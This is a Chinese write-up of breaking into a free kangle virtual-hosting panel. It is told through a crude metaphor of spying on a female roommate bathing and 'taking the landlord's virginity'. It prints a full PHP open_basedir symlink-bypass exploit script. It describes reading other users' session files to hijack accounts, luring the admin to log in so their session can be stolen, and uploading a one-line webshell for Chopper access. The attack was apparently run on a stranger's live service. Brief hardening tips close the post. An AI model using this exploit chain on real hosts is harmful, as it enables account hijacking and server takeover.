kangle主机之我是如何偷看合租女室友洗澡并把房子占为己有的

内容简介：kangle主机之我是如何偷看合租女室友洗澡并把房子占为己有的

* 本文原创作者：r41nbow ， 本文属FreeBuf原创奖励计划，未经许可禁止转载

kangle web服务器( 简称：kangle ) 是一款跨平台、功能强大、安全稳定、易操作的高性能web服务器和反向代理服务器软件。 除此：kangle也是一款专为做虚拟主机研发的web服务器。实现虚拟主机独立进程、独立身份运行。用户之间安全隔离，一个用户出问题不影响其他用户。安全支持 php 、asp、asp.net、 java 、 ruby 等多种动态开发语言。

以上是kangle官网的简介。

一 、 踩点

潜入一个群进行暗中观察，随口问了一句”哪点有免费主机”。热心人丢来一个链接，马上打开注册，开通。发现是kangle主机管理系统开设的。习惯性为热心人检测下安全。上传phpinfo查看，命令执行函数被禁用，open_basedir也开启了限制。默认只能访问到网站目录和/tmp目录。

胸口一凉，难道如此美女就可遇不可求了吗？！

下载安装kangle和管理面板。单独kangle做web服务，开启80和3311端口。安装kangle对应主机管理系统开启80,3311,3312,3313端口。

3312面板为主机管理面板，可以进行站点开通、主机管理、文件管理。

站点路径/vhs/kangle/nodewww/webftp

临时文件存放路径：/vhs/kangle/nodewww/tmp

3312登录的所有会话信息（session信息）存放在 /vhs/kangle/nodewww/tmp目录下。

二 、偷看女室友洗澡 思路

如果可以获取 /vhs/kangle/nodewww/tmp目录内容，就能伪造身份进行3312面板登录。

1.命令执行，直接列出该目录。

2.绕过open_basedir读取该目录内容。

针对思路1，由于已经设置了限制命令执行函数，才疏学浅，没能绕过。

上传open_basedir绕过脚本，内容如下：

<?php
/*
PHP 5.3 5.4 open_basedir bypass exploit 
by Maksymilian Arciemowicz http://cxsecurity.com/
cxib [ a.T] cxsecurity [ d0t] com
*/

$fakedir="cx";
$fakedep=16;

$num=0; // offset of symlink.$num

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file="";

echo '<PRE>
.__ __ 
____ ___ ___ ______ ____ ____ __ _________|__|/ |_ ___.__.
_/ ___\\\\ \/ / / ___// __ \_/ ___\| | \_ __ \ \ __< | |
\ \___ > < \___ \\\\ ___/\ \___| | /| | \/ || | \___ |
\___ >__/\_ \/____ >\___ >\___ >____/ |__| |__||__| / ____|
\/ \/ \/ \/ \/ \/ 

<p>PHP 5.4 open_basedir bypass exploit poc
<p>Script for legal use only. More: <a href="http://cxsecurity.com/" alt="exploit">cxsecurity.com</a>
<p><form name="form"
action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF"]).'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hym" value="Create Symlink"></form>';

if(empty($file))
exit;

if(!is_writable("."))
die("not writable directory");

$level=0;

for($as=0;$as<$fakedep;$as++){
if(!file_exists($fakedir))
mkdir($fakedir);
chdir($fakedir);
}

while(1<$as--) chdir("..");

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a])) 
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$as++;
}
}
$as++;
while($as--)
chdir("..");

@rmdir("fakesymlink");
@unlink("fakesymlink");

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

// this loop will skip allready created symlinks.
while(1)
if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
else $num++;

@unlink("fakesymlink");
mkdir("fakesymlink");

die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');

?>

访问文件，尝试读取临时目录内容.

通过3312面板文件管理查看结果。

成功绕过目录限制并列出了临时目录下的session文件。

修改浏览器cookie.(注：没有失效的session文件大小都不为0，sess_xxxxxx对应的session为去掉sess_)

修改后刷新浏览器，即可成功偷看到合租室友洗澡。

如下图，从xiaoge123会话修改session后成功到了yxmssbook的管理界面。

三 、 搞定房东

管理员面板为： http://IP:3312/admin 。诱导管理登录该面板后从tmp目录查看大小不为0的sess_x文件，一个一个会话伪造后刷新页面。

成功登录进入到管理界面。

四、直捣黄龙

进入了管理面板，我们权限就很大了，删除主机太残忍，无血海深仇，不干。

我们开设一个主机到/vhs/kangle/nodewww/webftp目录，这样我们就可以往主机管理面板站点写入文件。

建立后直接通过在线文件管理，上传一句话，直捣黄龙。

phpinfo查看3312面板站点是单独的配置文件，并且是没有做任何目录和函数限制。

菜刀连接测试：

至此房东处女膜已不保。

五、处女膜修复手术

手术建议：

1.修改默认管理面板访问路径，较少爆菊风险。

2.disable_functions禁用symlink。

3.设置tmp目录权限，禁止所属用户以外任何组织访问该目录。

默认为755改为700即可。

测试：

以上就是本文的全部内容，希望对大家的学习有所帮助，也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

• 北京五环实录：合租房里互不相识，凌晨四点互联网大厂上班

本站部分资源来源于网络，本站转载出于传递更多信息之目的，版权归原作者或者来源机构所有，如转载稿涉及版权问题，请联系我们。